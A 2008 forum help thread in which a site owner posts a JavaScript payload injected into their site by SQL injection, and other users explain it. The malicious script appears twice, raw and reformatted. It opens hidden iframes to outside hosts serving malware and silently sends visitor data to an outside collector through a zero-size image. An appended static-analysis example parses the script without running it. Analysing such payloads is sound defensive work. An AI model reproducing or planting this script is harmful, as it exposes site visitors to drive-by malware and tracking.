Solved

sql injection js script, can someone tell me what this is doing?

Posted on 2008-06-09
Last Modified: 2008-06-10
Our SQL Server DB was infected with some sort of SQL injection - I downloaded the .js and it is as follows:

document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");

if (navigator.systemLanguage=='zh-cn')
{

}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}



window.onerror=function(){return true};
document.write ('<script>var a3327tf="51la";var a3327pu="";var a3327pf="51la";var a3327su=window.location;var a3327sf=document.referrer;var a3327of="";var a3327op="";var a3327ops=1;var a3327ot=1;var a3327d=new Date();var a3327color="";if (navigator.appName=="Netscape"){a3327color=screen.pixelDepth;} else {a3327color=screen.colorDepth;}<\/script><script>a3327tf=top.document.referrer;<\/script><script>a3327pu =window.parent.location;<\/script><script>a3327pf=window.parent.document.referrer;<\/script><script>a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3327ops=(a3327ops==null)?1: (parseInt(unescape((a3327ops)[2]))+1);var a3327oe =new Date();a3327oe.setTime(a3327oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3327ops+ ";path=/;expires="+a3327oe.toGMTString();a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3327ot==null){a3327ot=1;}else{a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3327ot+";path=/;expires="+a3327oe.toGMTString();<\/script><script>a3327of=a3327sf;if(a3327pf!=="51la"){a3327of=a3327pf;}if(a3327tf!=="51la"){a3327of=a3327tf;}a3327op=a3327pu;try{lainframe}catch(e){a3327op=a3327su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');<\/script>');

Could someone tell me exactly what this is doing?

Thanks in advance.
Question by:samic400
3 Comments
 
LVL 6

Expert Comment

by:ysfx
ID: 21744909
Looks like code that sites use to track traffic from a different domain. My guess is that this is an attempt to circumvent sites that publish user input, like blogs and feedback.
 
LVL 3

Accepted Solution

by:
NizzeK earned 500 total points
ID: 21748375
You are not alone with this problem:
http://www.daniweb.com/forums/post614041.html
This is a Chinese attempt to gather information for malicious use.
See: http://www.sudosecure.net/archives/83

The code checks your pages and creates cookies (AJSTAT_ok_pages/AJSTAT_ok_times) with time stamp and availability information. Then it is printed in disguise of a utility, sending the collected information and identity to the data collector at web.51.la.
The code itself is not harmful, but it could reveal something unwanted.
I have reformatted the code to make the structure easier to see.

Best regards
Nils


document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");
 
if (navigator.systemLanguage=='zh-cn')
{
 
}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}
 
window.onerror=function(){return true};
document.write ('
	<script>
		var a3327tf="51la";
		var a3327pu="";
		var a3327pf="51la";
		var a3327su=window.location;
		var a3327sf=document.referrer;
		var a3327of="";
		var a3327op="";
		var a3327ops=1;
		var a3327ot=1;
		var a3327d=new Date();
		var a3327color="";
		if (navigator.appName=="Netscape")
			     {a3327color=screen.pixelDepth;} 
			else {a3327color=screen.colorDepth;}
	<\/script>
	<script>
		a3327tf=top.document.referrer;
	<\/script>
	<script>
		a3327pu =window.parent.location;
	<\/script>
	<script>
		a3327pf=window.parent.document.referrer;
	<\/script>
	<script>
		a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));
		a3327ops=(a3327ops==null)?1:(parseInt(unescape((a3327ops)[2]))+1);
		var a3327oe =new Date();
		a3327oe.setTime(a3327oe.getTime()+60*60*1000);
		document.cookie="AJSTAT_ok_pages="+a3327ops+ ";path=/;expires="+a3327oe.toGMTString();
		a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));
		if (a3327ot==null)
			     {a3327ot=1;}
			else {a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}
		a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);
		document.cookie="AJSTAT_ok_times="+a3327ot+";path=/;expires="+a3327oe.toGMTString();
	<\/script>
	<script>
		a3327of=a3327sf;
		if (a3327pf!=="51la")
			     {a3327of=a3327pf;}
		if(a3327tf!=="51la")
			     {a3327of=a3327tf;}
		a3327op=a3327pu;
		try{lainframe}catch(e){a3327op=a3327su;}
		document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'
			+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'
			+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');
	<\/script>');

 
LVL 3

Expert Comment

by:NizzeK
ID: 21748394
But to start with, it gets page 456.htm, and that one has the malicious 4562.swf, see more:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527?logdate=200808
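The behaviour described in the answers above, as an added example that is not part of the original thread: a static triage in JavaScript that reads the injected script as text (it is never executed) and lists the near-invisible iframes, the cookies it sets and the query fields of its hidden image beacon. The function names and the shortened SAMPLE excerpt are assumptions made for this example.

```javascript
// Added example: static triage of an injected script. The sample is only read as text, never run.
// SAMPLE is a shortened excerpt of the script posted in this thread.
const SAMPLE = String.raw`document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
document.cookie="AJSTAT_ok_pages="+a3327ops+";path=/;expires="+a3327oe.toGMTString();
document.cookie="AJSTAT_ok_times="+a3327ot+";path=/;expires="+a3327oe.toGMTString();
document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'+a3327ops+\'&ttimes=\'+a3327ot+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');`;

// Undo the JavaScript string escaping (\/ \' \") so the embedded markup can be matched.
function unescapeJs(text) {
  return text.replace(/\\([\/'"])/g, "$1");
}

// List every iframe the script writes into the page, with its source and size.
function findFrames(text) {
  const frames = [];
  for (const m of unescapeJs(text).matchAll(/<iframe\b([^>]*)>/gi)) {
    const src = (m[1].match(/\bsrc\s*=\s*["']?([^\s"'>]+)/i) || [])[1] || null;
    const dim = (name) => {
      const d = m[1].match(new RegExp("\\b" + name + "\\s*=\\s*[\"']?(\\d+)", "i"));
      return d ? Number(d[1]) : null;
    };
    const width = dim("width"), height = dim("height");
    // A frame at most 1px in either dimension is effectively invisible to the visitor.
    const hidden = (width !== null && width <= 1) || (height !== null && height <= 1);
    frames.push({ src, width, height, hidden });
  }
  return frames;
}

// Names of cookies the script assigns (document.cookie="NAME=...").
function findCookieNames(text) {
  const re = /document\.cookie\s*=\s*["']([A-Za-z0-9_]+)=/g;
  return [...new Set(Array.from(text.matchAll(re), (m) => m[1]))];
}

// Image beacons: collector host, the query fields sent to it, and whether the image is zero-sized.
function findBeacons(text) {
  const re = /<img\b[^>]*\bsrc\s*=\s*"(https?:\/\/[^"]+)/gi;
  return Array.from(unescapeJs(text).matchAll(re), (m) => ({
    host: new URL(m[1].split("'")[0]).hostname,
    params: Array.from(m[1].matchAll(/[?&]([A-Za-z]\w*)=/g), (p) => p[1]),
    hidden: /(?:width|height)\s*:\s*0(?:px)?\b/i.test(m[0]),
  }));
}

const triage = (text) => ({ frames: findFrames(text), cookies: findCookieNames(text), beacons: findBeacons(text) });
console.log(JSON.stringify(triage(SAMPLE), null, 2));
```
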
